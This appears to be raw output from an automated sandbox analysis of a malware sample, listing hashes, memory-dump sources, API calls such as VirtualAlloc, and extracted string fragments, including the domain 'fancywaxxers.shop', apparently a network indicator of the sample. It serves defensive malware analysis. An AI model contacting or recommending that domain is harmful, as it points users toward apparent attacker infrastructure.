                                                                                        • Instruction ID: e53c238d8c8b698f53fd03e5f3b55a2f60b3905ff55c7d06e30bca1f2b2d31cb
                                                                                        • Opcode Fuzzy Hash: 48ad45757fe133e13a79d95bf73dacf7304bc981996519f97dcff679c8444193
                                                                                        • Instruction Fuzzy Hash: E6C04831046120AACA602B15EC09B8A7B69AF99260F1245A2B004660B286A1AC829A94
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(00000000), ref: 0080A0AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 0d2412a8c25eab6bdc4b5e9560feddb06f642e12010c11dbe3539e5e6ea47c7c
                                                                                        • Instruction ID: 8c590a8071aaa99406fa8b67b50053461c1f7942b77580e0ce916adbb6f6147b
                                                                                        • Opcode Fuzzy Hash: 0d2412a8c25eab6bdc4b5e9560feddb06f642e12010c11dbe3539e5e6ea47c7c
                                                                                        • Instruction Fuzzy Hash: DEF092B18086289FE3512F1488456BEFBF4FF14711F02082DDAE986681D2710840DB97
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(00000000), ref: 008097C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 36a12270ea89a58c17dc35061c87d3df26e17f1be0e81943499b7a80bed302ba
                                                                                        • Instruction ID: 1afd4d428c841a35691ebab78b7354dea73b9d2ab2cfa96b67b5e79985da62ea
                                                                                        • Opcode Fuzzy Hash: 36a12270ea89a58c17dc35061c87d3df26e17f1be0e81943499b7a80bed302ba
                                                                                        • Instruction Fuzzy Hash: E2D017B028411E9BDB405F6488096DE3A64FF42326F754604FCA6D6EC5CA720C10DA14
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "0}$%<$$(99#$OIE{$Z_-c$fancywaxxers.shop$gM$-A+$~|$?'
                                                                                        • API String ID: 0-1394294594
                                                                                        • Opcode ID: 0cf8c70487554d8f51f76ed0a45d6881eec3c369fa015aabbc7ddff471176dea
                                                                                        • Instruction ID: 0febef3719303f7da51cb520667fbed964891fa38f452a2cadb17abf1f7f0500
                                                                                        • Opcode Fuzzy Hash: 0cf8c70487554d8f51f76ed0a45d6881eec3c369fa015aabbc7ddff471176dea
                                                                                        • Instruction Fuzzy Hash: 3D026C715183918FD314CF25C89176BBBE2FBD2314F188A6CE4D59B396D7798806CB82
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ($?$f$u$}
                                                                                        • API String ID: 0-3561895482
                                                                                        • Opcode ID: 49502e5ab74bdf3564ffe81497f1a16f8bd36b6f9ef1b15abcdcd0900b2db59c
                                                                                        • Instruction ID: df0b7249b104ad86ee8dbf20df147c70d2d4f754b2b6011dc1c740d74e13efd1
                                                                                        • Opcode Fuzzy Hash: 49502e5ab74bdf3564ffe81497f1a16f8bd36b6f9ef1b15abcdcd0900b2db59c
                                                                                        • Instruction Fuzzy Hash: 6612A47160C7808BC364DF38C4957AEBBE1AFD6320F598A7DE4D997392D63889418B43
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 2&!w$EW4$IIMC$O!);$T##"$T##"$uP$yt
                                                                                        • API String ID: 0-2143932533
                                                                                        • Opcode ID: 09effc1b13daa91b72845bbbe66f33b8a5e808bbdc37d5409809ad00b593fd89
                                                                                        • Instruction ID: 15bb3248628409d272da6ca9d4c93a1b7cc9c185f3d667a7aba2828ac4c70083
                                                                                        • Opcode Fuzzy Hash: 09effc1b13daa91b72845bbbe66f33b8a5e808bbdc37d5409809ad00b593fd89
                                                                                        • Instruction Fuzzy Hash: A9C1F47160C3918AD725CF3984903ABBFE1AF93354F18896DE5E59B382D23DC90AC752
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 65a$9%?$COw/$M*si$O_?u$l,n{$}?
                                                                                        • API String ID: 0-2796996607
                                                                                        • Opcode ID: 8e6e38a4e43d5fac2778eaf55a76f2628cb920753e4f02ba678c58a093b89dfa
                                                                                        • Instruction ID: 176e66a3dd018184fabf6f385c80b660f244562afd37860a7e05e4d0e9c28f45
                                                                                        • Opcode Fuzzy Hash: 8e6e38a4e43d5fac2778eaf55a76f2628cb920753e4f02ba678c58a093b89dfa
                                                                                        • Instruction Fuzzy Hash: 7BB2F4F36082049FE704AE29EC8567AFBE9EF94320F1A493DE6C4C7744E63598058797
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %$&$9$<$R$T$W$b
                                                                                        • API String ID: 0-3780034300
                                                                                        • Opcode ID: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
                                                                                        • Instruction ID: 240b73bbce379718b3a556962ac953e639dd61d8309820e7bdc784093930c52a
                                                                                        • Opcode Fuzzy Hash: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
                                                                                        • Instruction Fuzzy Hash: 7A71912150D7C28ED351867D484425BAFD26BE7234F2C8FACE5E9873D3C56AC50A9363
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Sin;$YzW+$dMKP$lmeH$xHLG
                                                                                        • API String ID: 0-2485238161
                                                                                        • Opcode ID: 92cfa172f8a44bf73de0843000adf2446a35c55ea8aff51b7af646726bf330a3
                                                                                        • Instruction ID: db460865c0ae1ae6e5113c8972c1153d3d590b6d32cf1603bd1f1a726516a0e4
                                                                                        • Opcode Fuzzy Hash: 92cfa172f8a44bf73de0843000adf2446a35c55ea8aff51b7af646726bf330a3
                                                                                        • Instruction Fuzzy Hash: B1221FB16083818FD7149F28D85136BBBE1EBC6304F08896EE5D59B382E779D905CB92
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: :G!A$Vw1q${u
                                                                                        • API String ID: 0-645793561
                                                                                        • Opcode ID: eb9a61f572f99eab07660f2be7400b593527c3fb04ab9fd56d00ebc0949f0af5
                                                                                        • Instruction ID: ef68929b3e8cc3f998d1c66d4e99579e6f017c1f7d02d80313965a6a6104e6be
                                                                                        • Opcode Fuzzy Hash: eb9a61f572f99eab07660f2be7400b593527c3fb04ab9fd56d00ebc0949f0af5
                                                                                        • Instruction Fuzzy Hash: DA0232B190021ACFDB15CF64C891ABBBBB1FF55310F18855CE859AB352E338A952CBD1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ]#WN$_%s=$zz~
                                                                                        • API String ID: 0-2772061215
                                                                                        • Opcode ID: 5c1626e00f52a39507e81ec99a959fd5a5e930613ed37ed9a17b7d62e93b0931
                                                                                        • Instruction ID: fe5e38471c45d9a192ea59018e5c3bd02e82b357811d45e06d1f75a2e08b1470
                                                                                        • Opcode Fuzzy Hash: 5c1626e00f52a39507e81ec99a959fd5a5e930613ed37ed9a17b7d62e93b0931
                                                                                        • Instruction Fuzzy Hash: 84E1F5B7E046148BF3445E29DC84366B7D2EBD5720F2B853CDA889B3C4D93E9C0A8785
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: H/'&$ur
                                                                                        • API String ID: 0-969745386
                                                                                        • Opcode ID: 8c24c0f4d3b73d3dcd747f0d05901d0ebeef0fac03a43f3aecd9681b021b627e
                                                                                        • Instruction ID: f9aff86bd3cc36e7c4372ac86a030a5ccdff95c1115e2bafa86d6e79a233e539
                                                                                        • Opcode Fuzzy Hash: 8c24c0f4d3b73d3dcd747f0d05901d0ebeef0fac03a43f3aecd9681b021b627e
                                                                                        • Instruction Fuzzy Hash: C8320672A083518BD728DF29D85176BB7E2EFC5310F09857DE8899B391EB74AC01C786
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `r]$hSN#
                                                                                        • API String ID: 0-3132102705
                                                                                        • Opcode ID: 75e9cf17b1b67a163edf54f46cc3d0446550cac62dde3f441a3ced80b287362f
                                                                                        • Instruction ID: 3919530eb4db5539ae7131176d72b8538650703ecb01254c327aa57046018605
                                                                                        • Opcode Fuzzy Hash: 75e9cf17b1b67a163edf54f46cc3d0446550cac62dde3f441a3ced80b287362f
                                                                                        • Instruction Fuzzy Hash: 1C02E0F3F146244BF3484938DC99366B696DBA4321F2F823D9F89A77C5E87E5C094284
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ="g($f@or
                                                                                        • API String ID: 0-556951699
                                                                                        • Opcode ID: 659fc639d7d57e01b701b50871541006bf62cb11d9ddade6e97ab2ebc0e39b32
                                                                                        • Instruction ID: 598dfcab697b9145ebd0b5bfc834a9252b4f31983cb875c5d493e2644b8b4470
                                                                                        • Opcode Fuzzy Hash: 659fc639d7d57e01b701b50871541006bf62cb11d9ddade6e97ab2ebc0e39b32
                                                                                        • Instruction Fuzzy Hash: 8CE1CCF3F506244BF3444979DC98366B692DB94324F2F823C8F98AB3C5D97E9D0A4284
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: WOgy$klG
                                                                                        • API String ID: 0-576771951
                                                                                        • Opcode ID: 3fa7bf094efc4d28df07e4b11c3c12c9dacd1322c84100a450320ceecfc9a567
                                                                                        • Instruction ID: 15f7393b22f29bc9cbd7444face2775afd8e889f4926f13c2986289dac6c0f08
                                                                                        • Opcode Fuzzy Hash: 3fa7bf094efc4d28df07e4b11c3c12c9dacd1322c84100a450320ceecfc9a567
                                                                                        • Instruction Fuzzy Hash: E7E1DFF3F146144BF3445E38DC983BA7692EB94320F1B823D9B899B7C4E97E58098385
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !-%.$i=+9
                                                                                        • API String ID: 0-3329930587
                                                                                        • Opcode ID: 6f3a6127ea03f0c12810755e38d89eb1c3fce6d78c26b690a1c1cad093f125e7
                                                                                        • Instruction ID: 2fd6bc69f2ce9672c6e7300665a2d25ba0f283982be9be4c7b00ac9f6f2404a8
                                                                                        • Opcode Fuzzy Hash: 6f3a6127ea03f0c12810755e38d89eb1c3fce6d78c26b690a1c1cad093f125e7
                                                                                        • Instruction Fuzzy Hash: 95D1B1B4A04245CFDF14CFA8D8D1ABEBBB1FF49304F0885A9D4169B392E7399901CB61
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #&J:$1?,s
                                                                                        • API String ID: 0-2217357408
                                                                                        • Opcode ID: bd6c12e60481e07178bd607e225df913fd0459df04a2d05e5939064cd9d7d474
                                                                                        • Instruction ID: d4d3c92f0f06948ad10f95a90fb1023b16ebcfee4a7e3774d95f9165781ffd66
                                                                                        • Opcode Fuzzy Hash: bd6c12e60481e07178bd607e225df913fd0459df04a2d05e5939064cd9d7d474
                                                                                        • Instruction Fuzzy Hash: 25D14671E08144DFDB18CF69EC916BEBBB2BF49310F1881A9E1559B392D73D8941CB20
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: )$IEND
                                                                                        • API String ID: 0-707183367
                                                                                        • Opcode ID: 6127af7bfcb50e60b4c2a97b5d339d3fc24466344aa243c9e8ed3a70c73f2159
                                                                                        • Instruction ID: 350f0689e27a114b921e0f46e132e7387bfd1f9f1a2ea249685521a2c1ae0cb1
                                                                                        • Opcode Fuzzy Hash: 6127af7bfcb50e60b4c2a97b5d339d3fc24466344aa243c9e8ed3a70c73f2159
                                                                                        • Instruction Fuzzy Hash: 4BD19FB1908344DFD720CF14D845B9ABBE4EF94304F14492DF9999B382D779E909CB92
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: NgUS$R
                                                                                        • API String ID: 0-1227284453
                                                                                        • Opcode ID: 912195fa3b7150b850652878b77d80a75c70b2038fa3ecdecbe6e49c4152ecb6
                                                                                        • Instruction ID: cb1d13e6d46f746741f262e0b4fd44b50744a9495faebe31e168d3480f0614a4
                                                                                        • Opcode Fuzzy Hash: 912195fa3b7150b850652878b77d80a75c70b2038fa3ecdecbe6e49c4152ecb6
                                                                                        • Instruction Fuzzy Hash: F5A186B3E115298BF3944D24CC583A2A2829BE5325F2F42788E0C7B7C5D93F6D4A63C4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$MVWT
                                                                                        • API String ID: 0-308850327
                                                                                        • Opcode ID: 29131a2c6b256f59291944cf235025aa57f226c25bccedb6804b2e0f594f54d5
                                                                                        • Instruction ID: 22013768fc0dfb1cd8f6f3b4a26a9fb72da25d6cc21963fd9f1fda495e5e0e1c
                                                                                        • Opcode Fuzzy Hash: 29131a2c6b256f59291944cf235025aa57f226c25bccedb6804b2e0f594f54d5
                                                                                        • Instruction Fuzzy Hash: 694106765193818BE314CF26C49027BB7E2EFDA304F595C1DE4C1AB294DB7C8946CB46
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: /:8*$x
                                                                                        • API String ID: 0-64667063
                                                                                        • Opcode ID: 2deb9410f1475fe4b565db496a902b8e1f1b89a6457a44a6c8662009b3b1d6b5
                                                                                        • Instruction ID: 288b885589acd09e32b9d286b9968fe6c0cb456c50fb3cc733ef4373b455ac8c
                                                                                        • Opcode Fuzzy Hash: 2deb9410f1475fe4b565db496a902b8e1f1b89a6457a44a6c8662009b3b1d6b5
                                                                                        • Instruction Fuzzy Hash: E301283690D7A28BD302CF299980212FFE1AB97710F194A5DD4E6A7391C529DE05C786
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Y%
                                                                                        • API String ID: 0-1305839261
                                                                                        • Opcode ID: a70d473a87b833f3113eaec21c47f6233042ff0c4ddc811491b14e55340e6615
                                                                                        • Instruction ID: 8bdb7eb7901626348ab5c52b1acb6119b1309a5935e22a28f68d69e3a53bfd7e
                                                                                        • Opcode Fuzzy Hash: a70d473a87b833f3113eaec21c47f6233042ff0c4ddc811491b14e55340e6615
                                                                                        • Instruction Fuzzy Hash: FF02ACF3F115244BF3444939CC583A66692DBE5325F2F82389E4CAB7C9E97E9C0A4284
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: etg}
                                                                                        • API String ID: 0-2051860544
                                                                                        • Opcode ID: 6d45c6ec2289fe558f9971a3ba2e9652fc37d3cd304298db8d17dfb6fa3311ac
                                                                                        • Instruction ID: ef668c3ba5f29ce23353fa0663b3e8b356fb1e144677ce6a0c1acfc112753a2e
                                                                                        • Opcode Fuzzy Hash: 6d45c6ec2289fe558f9971a3ba2e9652fc37d3cd304298db8d17dfb6fa3311ac
                                                                                        • Instruction Fuzzy Hash: 86F1CEB3F116248BF3544D29DC98366B6939BD4320F2F8678DE8CAB7C4D97E5C0A4285
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "
                                                                                        • API String ID: 0-123907689
                                                                                        • Opcode ID: dac31f3e8d82c414a5d017679b608916631b9901e939ee2a43c753c5a373f89f
                                                                                        • Instruction ID: b071db03cf464a6225505893a878b55255328d56c433025b81562e16c44b889b
                                                                                        • Opcode Fuzzy Hash: dac31f3e8d82c414a5d017679b608916631b9901e939ee2a43c753c5a373f89f
                                                                                        • Instruction Fuzzy Hash: DCD1B272A08345AFD714CE68C48576AB7F6BB84314F18892EE89987382E779DD44C783
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8q~
                                                                                        • API String ID: 0-4200682350
                                                                                        • Opcode ID: c5704d949c02c352f00a5dd66477a56aa614c8f823bb6ead80cce23f105652ab
                                                                                        • Instruction ID: ed9b4ccea2b7b91f0e143fa86904806851ffcdb62329bc343bcb23ec0e9f9750
                                                                                        • Opcode Fuzzy Hash: c5704d949c02c352f00a5dd66477a56aa614c8f823bb6ead80cce23f105652ab
                                                                                        • Instruction Fuzzy Hash: A1D19CF3F516254BF3544879CC983626683DBD5325F2F82788F28AB7C9D87E9C0A5284
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "u}
                                                                                        • API String ID: 0-3094662062
                                                                                        • Opcode ID: 0827cce93562a824d1df85cc04d2515ca529a0186582f18583ecb38ab2285023
                                                                                        • Instruction ID: 41c877fed100be465dea26a960b291bd14877087f8f0bbba300531b882a3bfd2
                                                                                        • Opcode Fuzzy Hash: 0827cce93562a824d1df85cc04d2515ca529a0186582f18583ecb38ab2285023
                                                                                        • Instruction Fuzzy Hash: FFD1F57290C351CFD718CF28D85136A7BE2AF85324F0AC9ADE4959B3A1D738D954CB81
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !
                                                                                        • API String ID: 0-2657877971
                                                                                        • Opcode ID: 9f1992f26d0fc37493252bfbe6f360c16b92bf33709e4507a80d3678040dc1ca
                                                                                        • Instruction ID: 53580d2467af2c79c3c38faa6a4c36d285593043e8e952b3edef655af5055469
                                                                                        • Opcode Fuzzy Hash: 9f1992f26d0fc37493252bfbe6f360c16b92bf33709e4507a80d3678040dc1ca
                                                                                        • Instruction Fuzzy Hash: DEB189B3F116254BF3844929CD583A26683EBD1325F2F82788E58AB7C9DC7E5D0A5384
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: `ibc
                                                                                        • API String ID: 2994545307-3725910391
                                                                                        • Opcode ID: 6a3b19841d2aeabecf837f2d6d868bf9124db2c26974597d6ab2e61f8c78fc74
                                                                                        • Instruction ID: 68c6305737256686377a60c37808dc71d64c6d96200c74bf2a09a2257640666c
                                                                                        • Opcode Fuzzy Hash: 6a3b19841d2aeabecf837f2d6d868bf9124db2c26974597d6ab2e61f8c78fc74
                                                                                        • Instruction Fuzzy Hash: 0191F3756183059BD7188F18C89167FB3E2EF99310F18852CE6958B396EB35EC51C782
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: <
                                                                                        • API String ID: 0-4251816714
                                                                                        • Opcode ID: 6ad2fdc3ce7edecdaad05254877c0a562ed5a42c383e81fae756f558f8caee23
                                                                                        • Instruction ID: 0370129012abbc8103a8d218d71de9eed37f1617d32395ff7b5ed46bca3341e1
                                                                                        • Opcode Fuzzy Hash: 6ad2fdc3ce7edecdaad05254877c0a562ed5a42c383e81fae756f558f8caee23
                                                                                        • Instruction Fuzzy Hash: 66A19EB3F1162547F3540D38CC983A26682D7A5325F2F82788E98BB7C9D87E9D0953C4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: F
                                                                                        • API String ID: 0-1304234792
                                                                                        • Opcode ID: f7867465b23a56fa26fb5474507fad267d220f77464da4228d92737fc36583f5
                                                                                        • Instruction ID: 9fab92e58e88c2c2c5fc790e58b167635396214136af631bb3789e3360086316
                                                                                        • Opcode Fuzzy Hash: f7867465b23a56fa26fb5474507fad267d220f77464da4228d92737fc36583f5
                                                                                        • Instruction Fuzzy Hash: 1CA16BB3F1162547F3944C69CC983A266839BE5321F2F42788E5CAB7C5ED7E5C0A5384
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: m
                                                                                        • API String ID: 0-3775001192
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: JS4
                                                                                        • API String ID: 0-2044837119
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: w
                                                                                        • API String ID: 0-476252946
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ~
                                                                                        • API String ID: 0-1707062198
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ~)2
                                                                                        • API String ID: 0-2509891921
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: W
                                                                                        • API String ID: 0-655174618
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: A[@4
                                                                                        • API String ID: 0-3016268453
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: e
                                                                                        • API String ID: 0-4024072794
                                                                                        • Opcode ID: e7c83974cc47c12589c223e7bd9f09a64189cb8ea2d1a4e26504e1d8f61321f7
                                                                                        • Instruction ID: 9ea252b14fd3982a30eb4a74c6197768230aaadf43a6501192361de745773489
                                                                                        • Opcode Fuzzy Hash: e7c83974cc47c12589c223e7bd9f09a64189cb8ea2d1a4e26504e1d8f61321f7
